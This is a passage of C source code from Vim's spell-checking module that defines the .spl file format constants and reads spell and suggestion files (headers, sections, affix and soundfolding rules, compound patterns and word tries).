* <SUGWORDTREE>: <wordtree> (see above, no flags or region used)
*
*
* <SUGTABLE>: <sugwcount> <sugline> ...
*
* <sugwcount> 4 bytes number of <sugline> following
*
* <sugline>: <sugnr> ... NUL
*
* <sugnr>: X bytes word number that results in this soundfolded word,
* stored as an offset to the previous number in as
* few bytes as possible, see offset2bytes())
*/
#include "vim.h"
#if defined(FEAT_SPELL) || defined(PROTO)
#ifndef UNIX /* it's in os_unix.h for Unix */
# include <time.h> /* for time_t */
#endif
#ifndef UNIX /* it's in os_unix.h for Unix */
# include <time.h> /* for time_t */
#endif
/* Special byte values for <byte>. Some are only used in the tree for
* postponed prefixes, some only in the other trees. This is a bit messy... */
#define BY_NOFLAGS 0 /* end of word without flags or region; for
* postponed prefix: no <pflags> */
#define BY_INDEX 1 /* child is shared, index follows */
#define BY_FLAGS 2 /* end of word, <flags> byte follows; for
* postponed prefix: <pflags> follows */
#define BY_FLAGS2 3 /* end of word, <flags> and <flags2> bytes
* follow; never used in prefix tree */
#define BY_SPECIAL BY_FLAGS2 /* highest special byte value */
/* Flags used in .spl file for soundsalike flags. */
#define SAL_F0LLOWUP 1
#define SAL_COLLAPSE 2
#define SAL_REM_ACCENTS 4
#define VIMSPELLMAGIC "VIMspell" /* string at start of Vim spell file */
#define VIMSPELLMAGICL 8
#define VIMSPELLVERSION 50
/* Section IDs. Only renumber them when VIMSPELLVERSION changes! */
#define SN_REGION 0 /* <regionname> section */
#define SN_CHARFLAGS 1 /* charflags section */
#define SN_MIDWORD 2 /* <midword> section */
#define SN_PREFCOND 3 /* <prefcond> section */
#define SN_REP 4 /* REP items section */
#define SN_SAL 5 /* SAL items section */
#define SN_SOFO 6 /* soundfolding section */
#define SN_MAP 7 /* MAP items section */
#define SN_COMPOUND 8 /* compound words section */
#define SN_SYLLABLE 9 /* syllable section */
#define SN_NOBREAK 10 /* NOBREAK section */
#define SN_SUGFILE 11 /* timestamp for .sug file */
#define SN_REPSAL 12 /* REPSAL items section */
#define SN_WORDS 13 /* common words */
#define SN_NOSPLITSUGS 14 /* don't split word for suggestions */
#define SN_INFO 15 /* info section */
#define SN_NOCOMPOUNDSUGS 16 /* don't compound for suggestions */
#define SN_END 255 /* end of sections */
#define SNF_REQUIRED 1 /* <sectionflags>: required section */
#define CF_WORD 0x01
#define CF_UPPER 0x02
static int set_spell_finish(spelltab_T *new_st);
static int write_spell_prefcond(FILE *fd, garray_T *gap);
static char_u *read_cnt_string(FILE *fd, int cnt_bytes, int *lenp);
static int read_region_section(FILE *fd, slang_T *slang, int len);
static int read_charflags_section(FILE *fd);
static int read_prefcond_section(FILE *fd, slang_T *lp);
static int read_rep_section(FILE *fd, garray_T *gap, short *first);
static int read_sal_section(FILE *fd, slang_T *slang);
static int read_words_section(FILE *fd, slang_T *lp, int len);
static int read_sofo_section(FILE *fd, slang_T *slang);
static int read_compound(FILE *fd, slang_T *slang, int len);
static int set_sofo(slang_T *lp, char_u *from, char_u *to);
static void set_sal_first(slang_T *lp);
#ifdef FEAT_MBYTE
static int *mb_str2wide(char_u *s);
#endif
static int spell_read_tree(FILE *fd, char_u **bytsp, idx_T **idxsp, int prefixtree, int prefixcnt);
static idx_T read_tree_node(FILE *fd, char_u *byts, idx_T *idxs, int maxidx, idx_T startidx, int prefixtree, int maxprefcondnr);
static void spell_reload_one(char_u *fname, int added_word);
static void set_spell_charflags(char_u *flags, int cnt, char_u *upp);
static int set_spell_chartab(char_u *fol, char_u *low, char_u *upp);
static void set_map_str(slang_T *lp, char_u *map);
static char *e_spell_trunc = N_("E758: Truncated spell file");
static char *e_afftrailing = N_("Trailing text in %s line %d: %s");
static char *e_affname = N_("Affix name too long in %s line %d: %s");
static char *e_affform = N_("E761: Format error in affix file FOL, LOW or UPP");
static char *e_affrange = N_("E762: Character in FOL, LOW or UPP is out of range");
static char *msg_compressing = N_("Compressing word tree...");
/*
* Load one spell file and store the info into a slang_T.
*
* This is invoked in three ways:
* - From spell_load_cb() to load a spell file for the first time. "lang" is
* the language name, "old_lp" is NULL. Will allocate an slang_T.
* - To reload a spell file that was changed. "lang" is NULL and "old_lp"
* points to the existing slang_T.
* - Just after writing a .spl file; it's read back to produce the .sug file.
* "old_lp" is NULL and "lang" is NULL. Will allocate an slang_T.
*
* Returns the slang_T the spell file was loaded into. NULL for error.
*/
slang_T *
spell_load_file(
char_u *fname,
char_u *lang,
slang_T *old_lp,
int silent) /* no error if file doesn't exist */
{
FILE *fd;
char_u buf[VIMSPELLMAGICL];
char_u *p;
int i;
int n;
int len;
char_u *save_sourcing_name = sourcing_name;
linenr_T save_sourcing_lnum = sourcing_lnum;
slang_T *lp = NULL;
int c = 0;
int res;
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
if (!silent)
EMSG2(_(e_notopen), fname);
else if (p_verbose > 2)
{
verbose_enter();
smsg((char_u *)e_notopen, fname);
verbose_leave();
}
goto endFAIL;
}
if (p_verbose > 2)
{
verbose_enter();
smsg((char_u *)_("Reading spell file \"%s\""), fname);
verbose_leave();
}
if (old_lp == NULL)
{
lp = slang_alloc(lang);
if (lp == NULL)
goto endFAIL;
/* Remember the file name, used to reload the file when it's updated. */
lp->sl_fname = vim_strsave(fname);
if (lp->sl_fname == NULL)
goto endFAIL;
/* Check for .add.spl (_add.spl for VMS). */
lp->sl_add = strstr((char *)gettail(fname), SPL_FNAME_ADD) != NULL;
}
else
lp = old_lp;
/* Set sourcing_name, so that error messages mention the file name. */
sourcing_name = fname;
sourcing_lnum = 0;
/*
* <HEADER>: <fileID>
*/
for (i = 0; i < VIMSPELLMAGICL; ++i)
buf[i] = getc(fd); /* <fileID> */
if (STRNCMP(buf, VIMSPELLMAGIC, VIMSPELLMAGICL) != 0)
{
EMSG(_("E757: This does not look like a spell file"));
goto endFAIL;
}
c = getc(fd); /* <versionnr> */
if (c < VIMSPELLVERSION)
{
EMSG(_("E771: Old spell file, needs to be updated"));
goto endFAIL;
}
else if (c > VIMSPELLVERSION)
{
EMSG(_("E772: Spell file is for newer version of Vim"));
goto endFAIL;
}
/*
* <SECTIONS>: <section> ... <sectionend>
* <section>: <sectionID> <sectionflags> <sectionlen> (section contents)
*/
for (;;)
{
n = getc(fd); /* <sectionID> or <sectionend> */
if (n == SN_END)
break;
c = getc(fd); /* <sectionflags> */
len = get4c(fd); /* <sectionlen> */
if (len < 0)
goto truncerr;
res = 0;
switch (n)
{
case SN_INFO:
lp->sl_info = read_string(fd, len); /* <infotext> */
if (lp->sl_info == NULL)
goto endFAIL;
break;
case SN_REGION:
res = read_region_section(fd, lp, len);
break;
case SN_CHARFLAGS:
res = read_charflags_section(fd);
break;
case SN_MIDWORD:
lp->sl_midword = read_string(fd, len); /* <midword> */
if (lp->sl_midword == NULL)
goto endFAIL;
break;
case SN_PREFCOND:
res = read_prefcond_section(fd, lp);
break;
case SN_REP:
res = read_rep_section(fd, &lp->sl_rep, lp->sl_rep_first);
break;
case SN_REPSAL:
res = read_rep_section(fd, &lp->sl_repsal, lp->sl_repsal_first);
break;
case SN_SAL:
res = read_sal_section(fd, lp);
break;
case SN_SOFO:
res = read_sofo_section(fd, lp);
break;
case SN_MAP:
p = read_string(fd, len); /* <mapstr> */
if (p == NULL)
goto endFAIL;
set_map_str(lp, p);
vim_free(p);
break;
case SN_WORDS:
res = read_words_section(fd, lp, len);
break;
case SN_SUGFILE:
lp->sl_sugtime = get8ctime(fd); /* <timestamp> */
break;
case SN_NOSPLITSUGS:
lp->sl_nosplitsugs = TRUE;
break;
case SN_NOCOMPOUNDSUGS:
lp->sl_nocompoundsugs = TRUE;
break;
case SN_COMPOUND:
res = read_compound(fd, lp, len);
break;
case SN_NOBREAK:
lp->sl_nobreak = TRUE;
break;
case SN_SYLLABLE:
lp->sl_syllable = read_string(fd, len); /* <syllable> */
if (lp->sl_syllable == NULL)
goto endFAIL;
if (init_syl_tab(lp) == FAIL)
goto endFAIL;
break;
default:
/* Unsupported section. When it's required give an error
* message. When it's not required skip the contents. */
if (c & SNF_REQUIRED)
{
EMSG(_("E770: Unsupported section in spell file"));
goto endFAIL;
}
while (--len >= 0)
if (getc(fd) < 0)
goto truncerr;
break;
}
someerror:
if (res == SP_FORMERROR)
{
EMSG(_(e_format));
goto endFAIL;
}
if (res == SP_TRUNCERROR)
{
truncerr:
EMSG(_(e_spell_trunc));
goto endFAIL;
}
if (res == SP_OTHERERROR)
goto endFAIL;
}
/* <LWORDTREE> */
res = spell_read_tree(fd, &lp->sl_fbyts, &lp->sl_fidxs, FALSE, 0);
if (res != 0)
goto someerror;
/* <KWORDTREE> */
res = spell_read_tree(fd, &lp->sl_kbyts, &lp->sl_kidxs, FALSE, 0);
if (res != 0)
goto someerror;
/* <PREFIXTREE> */
res = spell_read_tree(fd, &lp->sl_pbyts, &lp->sl_pidxs, TRUE,
lp->sl_prefixcnt);
if (res != 0)
goto someerror;
/* For a new file link it in the list of spell files. */
if (old_lp == NULL && lang != NULL)
{
lp->sl_next = first_lang;
first_lang = lp;
}
goto endOK;
endFAIL:
if (lang != NULL)
/* truncating the name signals the error to spell_load_lang() */
*lang = NUL;
if (lp != NULL && old_lp == NULL)
slang_free(lp);
lp = NULL;
endOK:
if (fd != NULL)
fclose(fd);
sourcing_name = save_sourcing_name;
sourcing_lnum = save_sourcing_lnum;
return lp;
}
/*
* Fill in the wordcount fields for a trie.
* Returns the total number of words.
*/
static void
tree_count_words(char_u *byts, idx_T *idxs)
{
int depth;
idx_T arridx[MAXWLEN];
int curi[MAXWLEN];
int c;
idx_T n;
int wordcount[MAXWLEN];
arridx[0] = 0;
curi[0] = 1;
wordcount[0] = 0;
depth = 0;
while (depth >= 0 && !got_int)
{
if (curi[depth] > byts[arridx[depth]])
{
/* Done all bytes at this node, go up one level. */
idxs[arridx[depth]] = wordcount[depth];
if (depth > 0)
wordcount[depth - 1] += wordcount[depth];
--depth;
fast_breakcheck();
}
else
{
/* Do one more byte at this node. */
n = arridx[depth] + curi[depth];
++curi[depth];
c = byts[n];
if (c == 0)
{
/* End of word, count it. */
++wordcount[depth];
/* Skip over any other NUL bytes (same word with different
* flags). */
while (byts[n + 1] == 0)
{
++n;
++curi[depth];
}
}
else
{
/* Normal char, go one level deeper to count the words. */
++depth;
arridx[depth] = idxs[n];
curi[depth] = 1;
wordcount[depth] = 0;
}
}
}
}
/*
* Load the .sug files for languages that have one and weren't loaded yet.
*/
void
suggest_load_files(void)
{
langp_T *lp;
int lpi;
slang_T *slang;
char_u *dotp;
FILE *fd;
char_u buf[MAXWLEN];
int i;
time_t timestamp;
int wcount;
int wordnr;
garray_T ga;
int c;
/* Do this for all languages that support sound folding. */
for (lpi = 0; lpi < curwin->w_s->b_langp.ga_len; ++lpi)
{
lp = LANGP_ENTRY(curwin->w_s->b_langp, lpi);
slang = lp->lp_slang;
if (slang->sl_sugtime != 0 && !slang->sl_sugloaded)
{
/* Change ".spl" to ".sug" and open the file. When the file isn't
* found silently skip it. Do set "sl_sugloaded" so that we
* don't try again and again. */
slang->sl_sugloaded = TRUE;
dotp = vim_strrchr(slang->sl_fname, '.');
if (dotp == NULL || fnamecmp(dotp, ".spl") != 0)
continue;
STRCPY(dotp, ".sug");
fd = mch_fopen((char *)slang->sl_fname, "r");
if (fd == NULL)
goto nextone;
/*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*/
for (i = 0; i < VIMSUGMAGICL; ++i)
buf[i] = getc(fd); /* <fileID> */
if (STRNCMP(buf, VIMSUGMAGIC, VIMSUGMAGICL) != 0)
{
EMSG2(_("E778: This does not look like a .sug file: %s"),
slang->sl_fname);
goto nextone;
}
c = getc(fd); /* <versionnr> */
if (c < VIMSUGVERSION)
{
EMSG2(_("E779: Old .sug file, needs to be updated: %s"),
slang->sl_fname);
goto nextone;
}
else if (c > VIMSUGVERSION)
{
EMSG2(_("E780: .sug file is for newer version of Vim: %s"),
slang->sl_fname);
goto nextone;
}
/* Check the timestamp, it must be exactly the same as the one in
* the .spl file. Otherwise the word numbers won't match. */
timestamp = get8ctime(fd); /* <timestamp> */
if (timestamp != slang->sl_sugtime)
{
EMSG2(_("E781: .sug file doesn't match .spl file: %s"),
slang->sl_fname);
goto nextone;
}
/*
* <SUGWORDTREE>: <wordtree>
* Read the trie with the soundfolded words.
*/
if (spell_read_tree(fd, &slang->sl_sbyts, &slang->sl_sidxs,
FALSE, 0) != 0)
{
someerror:
EMSG2(_("E782: error while reading .sug file: %s"),
slang->sl_fname);
slang_clear_sug(slang);
goto nextone;
}
/*
* <SUGTABLE>: <sugwcount> <sugline> ...
*
* Read the table with word numbers. We use a file buffer for
* this, because it's so much like a file with lines. Makes it
* possible to swap the info and save on memory use.
*/
slang->sl_sugbuf = open_spellbuf();
if (slang->sl_sugbuf == NULL)
goto someerror;
/* <sugwcount> */
wcount = get4c(fd);
if (wcount < 0)
goto someerror;
/* Read all the wordnr lists into the buffer, one NUL terminated
* list per line. */
ga_init2(&ga, 1, 100);
for (wordnr = 0; wordnr < wcount; ++wordnr)
{
ga.ga_len = 0;
for (;;)
{
c = getc(fd); /* <sugline> */
if (c < 0 || ga_grow(&ga, 1) == FAIL)
goto someerror;
((char_u *)ga.ga_data)[ga.ga_len++] = c;
if (c == NUL)
break;
}
if (ml_append_buf(slang->sl_sugbuf, (linenr_T)wordnr,
ga.ga_data, ga.ga_len, TRUE) == FAIL)
goto someerror;
}
ga_clear(&ga);
/*
* Need to put word counts in the word tries, so that we can find
* a word by its number.
*/
tree_count_words(slang->sl_fbyts, slang->sl_fidxs);
tree_count_words(slang->sl_sbyts, slang->sl_sidxs);
nextone:
if (fd != NULL)
fclose(fd);
STRCPY(dotp, ".spl");
}
}
}
/*
* Read a length field from "fd" in "cnt_bytes" bytes.
* Allocate memory, read the string into it and add a NUL at the end.
* Returns NULL when the count is zero.
* Sets "*cntp" to SP_*ERROR when there is an error, length of the result
* otherwise.
*/
static char_u *
read_cnt_string(FILE *fd, int cnt_bytes, int *cntp)
{
int cnt = 0;
int i;
char_u *str;
/* read the length bytes, MSB first */
for (i = 0; i < cnt_bytes; ++i)
cnt = (cnt << 8) + getc(fd);
if (cnt < 0)
{
*cntp = SP_TRUNCERROR;
return NULL;
}
*cntp = cnt;
if (cnt == 0)
return NULL; /* nothing to read, return NULL */
str = read_string(fd, cnt);
if (str == NULL)
*cntp = SP_OTHERERROR;
return str;
}
/*
* Read SN_REGION: <regionname> ...
* Return SP_*ERROR flags.
*/
static int
read_region_section(FILE *fd, slang_T *lp, int len)
{
int i;
if (len > 16)
return SP_FORMERROR;
for (i = 0; i < len; ++i)
lp->sl_regions[i] = getc(fd); /* <regionname> */
lp->sl_regions[len] = NUL;
return 0;
}
/*
* Read SN_CHARFLAGS section: <charflagslen> <charflags>
* <folcharslen> <folchars>
* Return SP_*ERROR flags.
*/
static int
read_charflags_section(FILE *fd)
{
char_u *flags;
char_u *fol;
int flagslen, follen;
/* <charflagslen> <charflags> */
flags = read_cnt_string(fd, 1, &flagslen);
if (flagslen < 0)
return flagslen;
/* <folcharslen> <folchars> */
fol = read_cnt_string(fd, 2, &follen);
if (follen < 0)
{
vim_free(flags);
return follen;
}
/* Set the word-char flags and fill SPELL_ISUPPER() table. */
if (flags != NULL && fol != NULL)
set_spell_charflags(flags, flagslen, fol);
vim_free(flags);
vim_free(fol);
/* When <charflagslen> is zero then <fcharlen> must also be zero. */
if ((flags == NULL) != (fol == NULL))
return SP_FORMERROR;
return 0;
}
/*
* Read SN_PREFCOND section.
* Return SP_*ERROR flags.
*/
static int
read_prefcond_section(FILE *fd, slang_T *lp)
{
int cnt;
int i;
int n;
char_u *p;
char_u buf[MAXWLEN + 1];
/* <prefcondcnt> <prefcond> ... */
cnt = get2c(fd); /* <prefcondcnt> */
if (cnt <= 0)
return SP_FORMERROR;
lp->sl_prefprog = (regprog_T **)alloc_clear(
(unsigned)sizeof(regprog_T *) * cnt);
if (lp->sl_prefprog == NULL)
return SP_OTHERERROR;
lp->sl_prefixcnt = cnt;
for (i = 0; i < cnt; ++i)
{
/* <prefcond> : <condlen> <condstr> */
n = getc(fd); /* <condlen> */
if (n < 0 || n >= MAXWLEN)
return SP_FORMERROR;
/* When <condlen> is zero we have an empty condition. Otherwise
* compile the regexp program used to check for the condition. */
if (n > 0)
{
buf[0] = '^'; /* always match at one position only */
p = buf + 1;
while (n-- > 0)
*p++ = getc(fd); /* <condstr> */
*p = NUL;
lp->sl_prefprog[i] = vim_regcomp(buf, RE_MAGIC + RE_STRING);
}
}
return 0;
}
/*
* Read REP or REPSAL items section from "fd": <repcount> <rep> ...
* Return SP_*ERROR flags.
*/
static int
read_rep_section(FILE *fd, garray_T *gap, short *first)
{
int cnt;
fromto_T *ftp;
int i;
cnt = get2c(fd); /* <repcount> */
if (cnt < 0)
return SP_TRUNCERROR;
if (ga_grow(gap, cnt) == FAIL)
return SP_OTHERERROR;
/* <rep> : <repfromlen> <repfrom> <reptolen> <repto> */
for (; gap->ga_len < cnt; ++gap->ga_len)
{
ftp = &((fromto_T *)gap->ga_data)[gap->ga_len];
ftp->ft_from = read_cnt_string(fd, 1, &i);
if (i < 0)
return i;
if (i == 0)
return SP_FORMERROR;
ftp->ft_to = read_cnt_string(fd, 1, &i);
if (i <= 0)
{
vim_free(ftp->ft_from);
if (i < 0)
return i;
return SP_FORMERROR;
}
}
/* Fill the first-index table. */
for (i = 0; i < 256; ++i)
first[i] = -1;
for (i = 0; i < gap->ga_len; ++i)
{
ftp = &((fromto_T *)gap->ga_data)[i];
if (first[*ftp->ft_from] == -1)
first[*ftp->ft_from] = i;
}
return 0;
}
/*
* Read SN_SAL section: <salflags> <salcount> <sal> ...
* Return SP_*ERROR flags.
*/
static int
read_sal_section(FILE *fd, slang_T *slang)
{
int i;
int cnt;
garray_T *gap;
salitem_T *smp;
int ccnt;
char_u *p;
int c = NUL;
slang->sl_sofo = FALSE;
i = getc(fd); /* <salflags> */
if (i & SAL_F0LLOWUP)
slang->sl_followup = TRUE;
if (i & SAL_COLLAPSE)
slang->sl_collapse = TRUE;
if (i & SAL_REM_ACCENTS)
slang->sl_rem_accents = TRUE;
cnt = get2c(fd); /* <salcount> */
if (cnt < 0)
return SP_TRUNCERROR;
gap = &slang->sl_sal;
ga_init2(gap, sizeof(salitem_T), 10);
if (ga_grow(gap, cnt + 1) == FAIL)
return SP_OTHERERROR;
/* <sal> : <salfromlen> <salfrom> <saltolen> <salto> */
for (; gap->ga_len < cnt; ++gap->ga_len)
{
smp = &((salitem_T *)gap->ga_data)[gap->ga_len];
ccnt = getc(fd); /* <salfromlen> */
if (ccnt < 0)
return SP_TRUNCERROR;
if ((p = alloc(ccnt + 2)) == NULL)
return SP_OTHERERROR;
smp->sm_lead = p;
/* Read up to the first special char into sm_lead. */
for (i = 0; i < ccnt; ++i)
{
c = getc(fd); /* <salfrom> */
if (vim_strchr((char_u *)"0123456789(-<^$", c) != NULL)
break;
*p++ = c;
}
smp->sm_leadlen = (int)(p - smp->sm_lead);
*p++ = NUL;
/* Put (abc) chars in sm_oneof, if any. */
if (c == '(')
{
smp->sm_oneof = p;
for (++i; i < ccnt; ++i)
{
c = getc(fd); /* <salfrom> */
if (c == ')')
break;
*p++ = c;
}
*p++ = NUL;
if (++i < ccnt)
c = getc(fd);
}
else
smp->sm_oneof = NULL;
/* Any following chars go in sm_rules. */
smp->sm_rules = p;
if (i < ccnt)
/* store the char we got while checking for end of sm_lead */
*p++ = c;
for (++i; i < ccnt; ++i)
*p++ = getc(fd); /* <salfrom> */
*p++ = NUL;
/* <saltolen> <salto> */
smp->sm_to = read_cnt_string(fd, 1, &ccnt);
if (ccnt < 0)
{
vim_free(smp->sm_lead);
return ccnt;
}
#ifdef FEAT_MBYTE
if (has_mbyte)
{
/* convert the multi-byte strings to wide char strings */
smp->sm_lead_w = mb_str2wide(smp->sm_lead);
smp->sm_leadlen = mb_charlen(smp->sm_lead);
if (smp->sm_oneof == NULL)
smp->sm_oneof_w = NULL;
else
smp->sm_oneof_w = mb_str2wide(smp->sm_oneof);
if (smp->sm_to == NULL)
smp->sm_to_w = NULL;
else
smp->sm_to_w = mb_str2wide(smp->sm_to);
if (smp->sm_lead_w == NULL
|| (smp->sm_oneof_w == NULL && smp->sm_oneof != NULL)
|| (smp->sm_to_w == NULL && smp->sm_to != NULL))
{
vim_free(smp->sm_lead);
vim_free(smp->sm_to);
vim_free(smp->sm_lead_w);
vim_free(smp->sm_oneof_w);
vim_free(smp->sm_to_w);
return SP_OTHERERROR;
}
}
#endif
}
if (gap->ga_len > 0)
{
/* Add one extra entry to mark the end with an empty sm_lead. Avoids
* that we need to check the index every time. */
smp = &((salitem_T *)gap->ga_data)[gap->ga_len];
if ((p = alloc(1)) == NULL)
return SP_OTHERERROR;
p[0] = NUL;
smp->sm_lead = p;
smp->sm_leadlen = 0;
smp->sm_oneof = NULL;
smp->sm_rules = p;
smp->sm_to = NULL;
#ifdef FEAT_MBYTE
if (has_mbyte)
{
smp->sm_lead_w = mb_str2wide(smp->sm_lead);
smp->sm_leadlen = 0;
smp->sm_oneof_w = NULL;
smp->sm_to_w = NULL;
}
#endif
++gap->ga_len;
}
/* Fill the first-index table. */
set_sal_first(slang);
return 0;
}
/*
* Read SN_WORDS: <word> ...
* Return SP_*ERROR flags.
*/
static int
read_words_section(FILE *fd, slang_T *lp, int len)
{
int done = 0;
int i;
int c;
char_u word[MAXWLEN];
while (done < len)
{
/* Read one word at a time. */
for (i = 0; ; ++i)
{
c = getc(fd);
if (c == EOF)
return SP_TRUNCERROR;
word[i] = c;
if (word[i] == NUL)
break;
if (i == MAXWLEN - 1)
return SP_FORMERROR;
}
/* Init the count to 10. */
count_common_word(lp, word, -1, 10);
done += i + 1;
}
return 0;
}
/*
* SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* Return SP_*ERROR flags.
*/
static int
read_sofo_section(FILE *fd, slang_T *slang)
{
int cnt;
char_u *from, *to;
int res;
slang->sl_sofo = TRUE;
/* <sofofromlen> <sofofrom> */
from = read_cnt_string(fd, 2, &cnt);
if (cnt < 0)
return cnt;
/* <sofotolen> <sofoto> */
to = read_cnt_string(fd, 2, &cnt);
if (cnt < 0)
{
vim_free(from);
return cnt;
}
/* Store the info in slang->sl_sal and/or slang->sl_sal_first. */
if (from != NULL && to != NULL)
res = set_sofo(slang, from, to);
else if (from != NULL || to != NULL)
res = SP_FORMERROR; /* only one of two strings is an error */
else
res = 0;
vim_free(from);
vim_free(to);
return res;
}
/*
* Read the compound section from the .spl file:
* <compmax> <compminlen> <compsylmax> <compoptions> <compflags>
* Returns SP_*ERROR flags.
*/
static int
read_compound(FILE *fd, slang_T *slang, int len)
{
int todo = len;
int c;
int atstart;
char_u *pat;
char_u *pp;
char_u *cp;
char_u *ap;
char_u *crp;
int cnt;
garray_T *gap;
if (todo < 2)
return SP_FORMERROR; /* need at least two bytes */
--todo;
c = getc(fd); /* <compmax> */
if (c < 2)
c = MAXWLEN;
slang->sl_compmax = c;
--todo;
c = getc(fd); /* <compminlen> */
if (c < 1)
c = 0;
slang->sl_compminlen = c;
--todo;
c = getc(fd); /* <compsylmax> */
if (c < 1)
c = MAXWLEN;
slang->sl_compsylmax = c;
c = getc(fd); /* <compoptions> */
if (c != 0)
ungetc(c, fd); /* be backwards compatible with Vim 7.0b */
else
{
--todo;
c = getc(fd); /* only use the lower byte for now */
--todo;
slang->sl_compoptions = c;
gap = &slang->sl_comppat;
c = get2c(fd); /* <comppatcount> */
todo -= 2;
ga_init2(gap, sizeof(char_u *), c);
if (ga_grow(gap, c) == OK)
while (--c >= 0)
{
((char_u **)(gap->ga_data))[gap->ga_len++] =
read_cnt_string(fd, 1, &cnt);
/* <comppatlen> <comppattext> */
if (cnt < 0)
return cnt;
todo -= cnt + 1;
}
}
if (todo < 0)
return SP_FORMERROR;
/* Turn the COMPOUNDRULE items into a regexp pattern:
* "a[bc]/a*b+" -> "^\(a[bc]\|a*b\+\)$".
* Inserting backslashes may double the length, "^\(\)$<Nul>" is 7 bytes.
* Conversion to utf-8 may double the size. */
c = todo * 2 + 7;
#ifdef FEAT_MBYTE
if (enc_utf8)
c += todo * 2;
#endif
pat = alloc((unsigned)c);
if (pat == NULL)
return SP_OTHERERROR;
/* We also need a list of all flags that can appear at the start and one
* for all flags. */
cp = alloc(todo + 1);
if (cp == NULL)
{
vim_free(pat);
return SP_OTHERERROR;
}
slang->sl_compstartflags = cp;
*cp = NUL;
ap = alloc(todo + 1);
if (ap == NULL)
{
vim_free(pat);
return SP_OTHERERROR;
}
slang->sl_compallflags = ap;
*ap = NUL;
/* And a list of all patterns in their original form, for checking whether
* compounding may work in match_compoundrule(). This is freed when we
* encounter a wildcard, the check doesn't work then. */
crp = alloc(todo + 1);
slang->sl_comprules = crp;
pp = pat;
*pp++ = '^';
*pp++ = '\\';
*pp++ = '(';
atstart = 1;
while (todo-- > 0)
{
c = getc(fd); /* <compflags> */
if (c == EOF)
{
vim_free(pat);
return SP_TRUNCERROR;
}
/* Add all flags to "sl_compallflags". */
if (vim_strchr((char_u *)"?*+[]/", c) == NULL
&& !byte_in_str(slang->sl_compallflags, c))
{
*ap++ = c;
*ap = NUL;
}
if (atstart != 0)
{
/* At start of item: copy flags to "sl_compstartflags". For a
* [abc] item set "atstart" to 2 and copy up to the ']'. */
if (c == '[')
atstart = 2;
else if (c == ']')
atstart = 0;
else
{
if (!byte_in_str(slang->sl_compstartflags, c))
{
*cp++ = c;
*cp = NUL;
}
if (atstart == 1)
atstart = 0;
}
}
/* Copy flag to "sl_comprules", unless we run into a wildcard. */
if (crp != NULL)
{
if (c == '?' || c == '+' || c == '*')
{
vim_free(slang->sl_comprules);
slang->sl_comprules = NULL;
crp = NULL;
}
else
*crp++ = c;
}
if (c == '/') /* slash separates two items */
{
*pp++ = '\\';
*pp++ = '|';
atstart = 1;
}
else /* normal char, "[abc]" and '*' are copied as-is */
{
if (c == '?' || c == '+' || c == '~')
*pp++ = '\\'; /* "a?" becomes "a\?", "a+" becomes "a\+" */
#ifdef FEAT_MBYTE
if (enc_utf8)
pp += mb_char2bytes(c, pp);
else
#endif
*pp++ = c;
}
}
*pp++ = '\\';
*pp++ = ')';
*pp++ = '$';
*pp = NUL;
if (crp != NULL)
*crp = NUL;
slang->sl_compprog = vim_regcomp(pat, RE_MAGIC + RE_STRING + RE_STRICT);
vim_free(pat);
if (slang->sl_compprog == NULL)
return SP_FORMERROR;
return 0;
}
/*
* Set the SOFOFROM and SOFOTO items in language "lp".
* Returns SP_*ERROR flags when there is something wrong.
*/
static int
set_sofo(slang_T *lp, char_u *from, char_u *to)
{
int i;
#ifdef FEAT_MBYTE
garray_T *gap;
char_u *s;
char_u *p;
int c;
int *inp;
if (has_mbyte)
{
/* Use "sl_sal" as an array with 256 pointers to a list of wide
* characters. The index is the low byte of the character.
* The list contains from-to pairs with a terminating NUL.
* sl_sal_first[] is used for latin1 "from" characters. */
gap = &lp->sl_sal;
ga_init2(gap, sizeof(int *), 1);
if (ga_grow(gap, 256) == FAIL)
return SP_OTHERERROR;
vim_memset(gap->ga_data, 0, sizeof(int *) * 256);
gap->ga_len = 256;
/* First count the number of items for each list. Temporarily use
* sl_sal_first[] for this. */
for (p = from, s = to; *p != NUL && *s != NUL; )
{
c = mb_cptr2char_adv(&p);
mb_cptr_adv(s);
if (c >= 256)
++lp->sl_sal_first[c & 0xff];
}
if (*p != NUL || *s != NUL) /* lengths differ */
return SP_FORMERROR;
/* Allocate the lists. */
for (i = 0; i < 256; ++i)
if (lp->sl_sal_first[i] > 0)
{
p = alloc(sizeof(int) * (lp->sl_sal_first[i] * 2 + 1));
if (p == NULL)
return SP_OTHERERROR;
((int **)gap->ga_data)[i] = (int *)p;
*(int *)p = 0;
}
/* Put the characters up to 255 in sl_sal_first[] the rest in a sl_sal
* list. */
vim_memset(lp->sl_sal_first, 0, sizeof(salfirst_T) * 256);
for (p = from, s = to; *p != NUL && *s != NUL; )
{
c = mb_cptr2char_adv(&p);
i = mb_cptr2char_adv(&s);
if (c >= 256)
{
/* Append the from-to chars at the end of the list with
* the low byte. */
inp = ((int **)gap->ga_data)[c & 0xff];
while (*inp != 0)
++inp;
*inp++ = c; /* from char */
*inp++ = i; /* to char */
*inp++ = NUL; /* NUL at the end */
}
else
/* mapping byte to char is done in sl_sal_first[] */
lp->sl_sal_first[c] = i;
}
}
else
#endif
{
/* mapping bytes to bytes is done in sl_sal_first[] */
if (STRLEN(from) != STRLEN(to))
return SP_FORMERROR;
for (i = 0; to[i] != NUL; ++i)
lp->sl_sal_first[from[i]] = to[i];
lp->sl_sal.ga_len = 1; /* indicates we have soundfolding */
}
return 0;
}
/*
* Fill the first-index table for "lp".
*/
static void
set_sal_first(slang_T *lp)
{
salfirst_T *sfirst;
int i;
salitem_T *smp;
int c;
garray_T *gap = &lp->sl_sal;
sfirst = lp->sl_sal_first;
for (i = 0; i < 256; ++i)
sfirst[i] = -1;
smp = (salitem_T *)gap->ga_data;
for (i = 0; i < gap->ga_len; ++i)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
/* Use the lowest byte of the first character. For latin1 it's
* the character, for other encodings it should differ for most
* characters. */
c = *smp[i].sm_lead_w & 0xff;
else
#endif
c = *smp[i].sm_lead;
if (sfirst[c] == -1)
{
sfirst[c] = i;
#ifdef FEAT_MBYTE
if (has_mbyte)
{
int n;
/* Make sure all entries with this byte are following each
* other. Move the ones that are in the wrong position. Do
* keep the same ordering! */
while (i + 1 < gap->ga_len
&& (*smp[i + 1].sm_lead_w & 0xff) == c)
/* Skip over entry with same index byte. */
++i;
for (n = 1; i + n < gap->ga_len; ++n)
if ((*smp[i + n].sm_lead_w & 0xff) == c)
{
